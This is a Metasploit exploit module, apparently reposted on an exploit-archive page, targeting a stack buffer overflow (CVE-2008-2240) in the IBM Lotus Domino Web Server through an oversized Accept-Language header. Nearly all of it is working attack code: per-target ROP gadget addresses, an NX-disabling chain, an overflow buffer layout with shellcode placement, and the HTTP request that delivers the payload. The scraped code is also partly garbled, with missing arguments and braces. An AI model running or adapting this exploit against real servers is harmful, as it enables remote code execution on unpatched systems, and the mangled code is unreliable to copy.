IBM Lotus Domino Web Server – Accept-Language Stack Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2010-11-11
  • 类别:
  • 来源:
  • ##
    # $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = AverageRanking
    	include Msf::Exploit::Remote::HttpClient
    	def initialize(info = {})
    			'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
    			'Description'		=> %q{
    					This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
    				prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
    				request with an Accept-Language header greater than 114 bytes.
    			'Author'		=> [ 'Fairuzan Roslan riaf[at]', 'Earl Marcus klks[at]' ],
    			'License'		=> MSF_LICENSE,
    			'Version'		=> '$Revision: 10998 $',
    			'References'		=>
    					['CVE', '2008-2240'],
    					['OSVDB', '45415'],
    					['BID', '29310'],
    					['URL', ''],
    			'DefaultOptions'	=>
    					'EXITFUNC'	=> 'thread',
    			'Privileged'		=> true,
    			'Payload'		=>
    					'Space'			=> 800,
    					'BadChars'		=> "\x00\x0a\x20\x2c\x3b",
    					'StackAdjustment'	=> -3500,
    			'Platform'		=>	'win',
    			'Targets'		=>
    					['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
    							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll
    							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
    							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
    							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl
    							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
    							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
    					['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
    							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
    							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
    							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
    							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll
    							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
    							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
    					['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
    							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
    							'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll
    					['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
    							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
    							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
    							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
    							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
    							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
    							'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll
    					['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
    							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
    							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
    							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
    							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
    							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
    							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
    					['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
    							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
    							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
    			'DisclosureDate' => 'May 20 2008'))
    		register_options( [ Opt::RPORT(80) ], self.class )
    	def exploit
    		lang = rand_text_alphanumeric(116)				# greetz to hateful chris
    		lang[ 56,4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)
    		lang[ 68,4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax)
    		lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash
    		lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1
    		lang << "\x00"
    		lang << payload.encoded
    		if(not target['DisableNX'])
    			lang[ 16, 15 ] = Metasm::Shellcode.assemble(, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4
    			lang[ 80,4 ] = [target['JmpESP']].pack('V')		# 2
    			lang[ 84,2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top
    			lang[ 16, 16 ] = Metasm::Shellcode.assemble(, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8
    			lang[ 80,4 ] = [target['FixESI']].pack('V')		# 2
    			lang[ 84,4 ] = [target['FixEBP']].pack('V')		# 3
    			lang[ 88,4 ] = [target['Ret']].pack('V')		# 4
    			lang[ 92,4 ] = [target['JmpESP']].pack('V')		# 6
    			lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7jmp back to top
    			lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5
    		uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger
    		print_status("Trying target #{}...")
    						'uri'			=> "#{uri}",
    						'method'		=> 'GET',
    						'headers'		=>
    							'Accept'		=> '*/*',
    							'Accept-Language'	=> "#{lang}",
    							'Accept-Encoding'	=> 'gzip,deflate',
    							'Keep-Alive'		=> '300',
    							'Connection'		=> 'keep-alive',
    							'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    					}, 5)